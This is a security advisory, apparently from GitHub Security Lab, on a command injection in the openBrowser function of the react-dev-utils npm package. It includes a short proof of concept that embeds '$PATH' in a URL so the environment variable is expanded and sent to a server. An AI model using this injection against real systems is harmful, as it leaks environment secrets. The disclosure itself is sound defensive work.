Coordinated Disclosure Timeline

Summary

There exists a command injection, similar to CVE-2021-24033, in the react-dev-utils npm package, which is a part of Facebook’s facebook/create-react-app repository.

However, this vulnerability is less severe, as there is a sanitizer which prevents execution of shell scripts. But it is still possible to extract environment variables and send these to an arbitrary server. The exploit only works on Mac OS X.

Similary, as noted in the CVE-2021-24033 advisory: Only when this function is manually invoked with user-provided values (ie: by custom code) is there the potential for command injection. If you're consuming it from react-scripts then this issue does not affect you. Command injection in the react-dev-utils npm package, which is a part of Facebook’s facebook/create-react-app repository.

Product

npm package: react-dev-utils.
Part of the facebook/create-react-app repository.

Tested Version

11.0.4

Details

This is the vulnerable code: https://github.com/facebook/create-react-app/blob/master/packages/react-dev-utils/openBrowser.js#L94

The following PoC will expand the $PATH environment variable and send it to localhost:3000 on MacOS systems.

var openBrowser = require('react-dev-utils/openBrowser');

if (openBrowser('http://localhost:3000/$PATH')) {
console.log('The browser tab has been opened!');
}

The problem is that react-dev-utils creates and executes a shell script and environment variables are expanded in this shell script.

Impact

Information Disclosure

Resources

CVE

Resources

Credit

This issue was discovered and reported by GitHub CodeQL team member @erik-krogh (Erik Krogh).

Contact

You can contact the GHSL team at securitylab@github.com, please include GHSL-2021-070 in any communication regarding this issue.